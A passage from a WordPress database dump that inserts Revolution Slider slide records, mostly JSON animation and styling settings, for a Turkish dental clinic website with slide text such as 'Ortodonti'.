center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":146,\"height\":140,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[-100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"6\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":6,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":11,\"positionLeftReset\":120,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"}]', '\"\"');
INSERT INTO `zdenl_revslider_slides` (`id`, `slider_id`, `slide_order`, `params`, `layers`, `settings`) VALUES
(2, 1, 3, '{\"background_type\":\"image\",\"image\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/slider-tel2.jpg\",\"title\":\"Slide\",\"state\":\"published\",\"date_from\":\"\",\"date_to\":\"\",\"slide_transition\":[\"parallaxvertical\"],\"0\":\"Remove\",\"slot_amount\":[\"default\"],\"transition_rotation\":[\"0\"],\"transition_duration\":[\"650\"],\"delay\":\"5000\",\"enable_link\":\"false\",\"link_type\":\"regular\",\"link\":\"\",\"link_open_in\":\"same\",\"slide_link\":\"nothing\",\"link_pos\":\"front\",\"slide_thumb\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"slide_bg_color\":\"#E7E7E7\",\"slide_bg_external\":\"\",\"bg_fit\":\"cover\",\"bg_fit_x\":\"100\",\"bg_fit_y\":\"100\",\"bg_repeat\":\"no-repeat\",\"bg_position\":\"center center\",\"bg_position_x\":\"0\",\"bg_position_y\":\"0\",\"kenburn_effect\":\"off\",\"kb_start_fit\":\"100\",\"kb_end_fit\":\"100\",\"bg_end_position\":\"left bottom\",\"kb_duration\":\"6000\",\"kb_easing\":\"Power0.easeIn\",\"rs-gallery-type\":\"gallery\",\"bg_external\":\"\",\"bg_color\":\"#E7E7E7\",\"slide_bg_youtube\":\"\",\"slide_bg_vimeo\":\"\",\"slide_bg_html_mpeg\":\"\",\"slide_bg_html_webm\":\"\",\"slide_bg_html_ogv\":\"\",\"image_source_type\":\"full\",\"alt_option\":\"media_library\",\"alt_attr\":\"\",\"ext_width\":\"1920\",\"ext_height\":\"1080\",\"video_force_cover\":\"on\",\"video_dotted_overlay\":\"none\",\"video_ratio\":\"16:9\",\"video_start_at\":\"\",\"video_end_at\":\"\",\"video_loop\":\"none\",\"video_nextslide\":\"off\",\"video_force_rewind\":\"on\",\"video_mute\":\"on\",\"video_volume\":\"\",\"video_speed\":\"1\",\"video_arguments\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"video_arguments_vim\":\"title=0&byline=0&portrait=0&api=1\",\"kb_start_offset_x\":\"0\",\"kb_end_offset_x\":\"0\",\"kb_start_offset_y\":\"0\",\"kb_end_offset_y\":\"0\",\"kb_start_rotate\":\"0\",\"kb_end_rotate\":\"0\",\"hideslideafter\":\"0\",\"save_performance\":\"off\",\"thumb_dimension\":\"slider\",\"thumb_for_admin\":\"off\",\"transition_ease_in\":[\"default\"],\"transition_ease_out\":[\"default\"],\"params_1\":\"\",\"params_1_chars\":\"10\",\"params_2\":\"\",\"params_2_chars\":\"10\",\"params_3\":\"\",\"params_3_chars\":\"10\",\"params_4\":\"\",\"params_4_chars\":\"10\",\"params_5\":\"\",\"params_5_chars\":\"10\",\"params_6\":\"\",\"params_6_chars\":\"10\",\"params_7\":\"\",\"params_7_chars\":\"10\",\"params_8\":\"\",\"params_8_chars\":\"10\",\"params_9\":\"\",\"params_9_chars\":\"10\",\"params_10\":\"\",\"params_10_chars\":\"10\",\"slide_description\":\"\",\"class_attr\":\"\",\"id_attr\":\"\",\"data_attr\":\"\",\"title_option\":\"media_library\",\"title_attr\":\"\",\"media-filter-type\":\"none\",\"stoponpurpose\":\"false\",\"invisibleslide\":\"false\",\"hideslideonmobile\":\"off\",\"ph-round-tabs-font-family-font_family-slide\":\"off\",\"ph-round-tabs-font-family-font_family\":\"Roboto\",\"ph-round-tabs-border-color-color-rgba-slide\":\"off\",\"ph-round-tabs-border-color-color-rgba\":\"#e5e5e5\",\"ph-round-tabs-border-size-custom-slide\":\"off\",\"ph-round-tabs-border-size-custom\":\"1\",\"ph-round-tabs-image-size-custom-slide\":\"off\",\"ph-round-tabs-image-size-custom\":\"60\",\"ph-round-tabs-param1-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param1-color-color-rgba\":\"rgba(51,51,51,0.5)\",\"ph-round-tabs-param1-size-custom-slide\":\"off\",\"ph-round-tabs-param1-size-custom\":\"12\",\"ph-round-tabs-hover-bg-color-color-rgba-slide\":\"off\",\"ph-round-tabs-hover-bg-color-color-rgba\":\"#eeeeee\",\"ph-round-tabs-bgcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-bgcolor-color-rgba\":\"rgba(0,0,0,0)\",\"ph-round-tabs-contentcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-contentcolor-color-rgba\":\"#333333\",\"ph-round-tabs-param2-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param2-color-color-rgba\":\"transparent\",\"ph-round-tabs-param2-size-custom-slide\":\"off\",\"ph-round-tabs-param2-size-custom\":\"14\",\"ph-round-thumbs-title-bg-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-bg-color-rgba\":\"rgba(0,0,0,0.85)\",\"ph-round-thumbs-title-color-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-color-color-rgba\":\"#ffffff\",\"ph-round-thumbs-title-font-size-custom-slide\":\"off\",\"ph-round-thumbs-title-font-size-custom\":\"12\",\"slide_parallax_level\":\"4\",\"kb_blur_start\":\"0\",\"kb_blur_end\":\"0\",\"image_id\":\"6532\",\"0\":\"Remove\"}', '[{\"static_styles\":{\"font-size\":{\"desktop\":\"\"},\"line-height\":{\"desktop\":\"\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"\"},\"letter-spacing\":{\"desktop\":\"\"}},\"deformation\":{\"background-color\":\"rgba(0,0,0,0.5)\",\"border-color\":\"rgba(0,0,0,0.5)\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-style\":\"solid\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"font-style\":\"normal\",\"text-decoration\":\"none\",\"vertical-align\":\"top\",\"text-transform\":\"none\",\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"overflow\":\"visible\",\"font-family\":\"\"},\"deformation-hover\":{\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"pointer_events\":\"auto\"},\"text\":\" \",\"alias\":\"Shape\",\"type\":\"shape\",\"style\":\"\",\"internal_class\":\"tp-shape tp-shapewrapper\",\"autolinebreak\":false,\"max_width\":{\"desktop\":\"538px\"},\"max_height\":{\"desktop\":\"501px\"},\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":10,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"tp-fade\",\"easing\":\"Power3.easeInOut\",\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"time_relative\":10,\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870.0003051758,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"\",\"easing\":\"Power3.easeInOut\",\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"time_relative\":4560.0003051758,\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":{},\"unique_id\":6,\"left\":{\"desktop\":4},\"top\":{\"desktop\":0},\"isDemo\":false,\"hover\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"min_height\":\"40px\",\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"left\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_follow\":\"follow\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":200,\"height\":500,\"cover_mode\":\"custom\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"inherit\",\"y_start\":\"inherit\",\"z_start\":\"inherit\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"0\",\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"x_rotate_start\":\"inherit\",\"y_rotate_start\":\"inherit\",\"z_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":0,\"endWithSlide\":false,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"scaleX\":{\"desktop\":\"\"},\"scaleY\":{\"desktop\":\"\"},\"displaymode\":true,\"scaleProportional\":false,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrTabindex\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"p_uid\":-1,\"zIndex\":5,\"positionLeftReset\":1,\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"addedToStage\":true,\"parallax_layer_ddd_zlevel\":\"front\"},{\"text\":\"Ortodonti\",\"type\":\"text\",\"left\":{\"desktop\":17,\"notebook\":35},\"top\":{\"desktop\":62,\"notebook\":76},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":296,\"height\":60,\"serial\":1,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"700\",\"notebook\":\"700\"},\"font-size\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"line-height\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Limitless\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":2,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":600.00030517578,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":600.00030517578,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870.0003051758,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3870,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"center\",\"notebook\":\"center\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":6,\"positionLeftReset\":70,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"text\":\"Sa\\u011fl\\u0131kl\